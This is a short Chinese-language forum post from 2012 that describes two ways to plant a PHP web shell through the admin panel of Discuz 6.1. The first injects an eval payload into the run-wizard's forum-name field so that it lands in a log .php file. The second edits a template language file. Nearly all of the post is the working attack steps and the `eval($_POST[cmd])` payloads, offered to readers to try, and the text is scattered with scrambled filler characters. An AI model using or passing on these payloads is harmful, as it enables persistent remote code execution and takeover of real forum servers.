discuz6.1两种方法后台拿shell
. z9 z! k* E' {% k5 |+ f* i& W B好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
6 s8 A% E; N: ^. h, \$ c1:/ {4 B) w' y+ }) e% T0 P; |% t
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
& R% |9 z( o/ `5 j" s0 badmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
+ U3 ~) _" _( M<?php eval($_POST[cmd]);?>! _- |9 L8 x* @2 K
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
( v t- [3 K. Q
( h9 ~$ Y: Z7 z9 E/ Q$ p- g9 D- S3 R. z8 o
2:后台模板管理--默认模板套系--详情
+ B. U! L. p4 Z: z9 V+ Ktemplates/default/actions.lang.php
! {$ ]! h' z |! ^jhackj\\');eval($_POST[cmd])?>;//% `7 Y0 |2 x$ G; u+ X7 ]5 u
c9 {) E) T$ M: H: ?" U! X
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对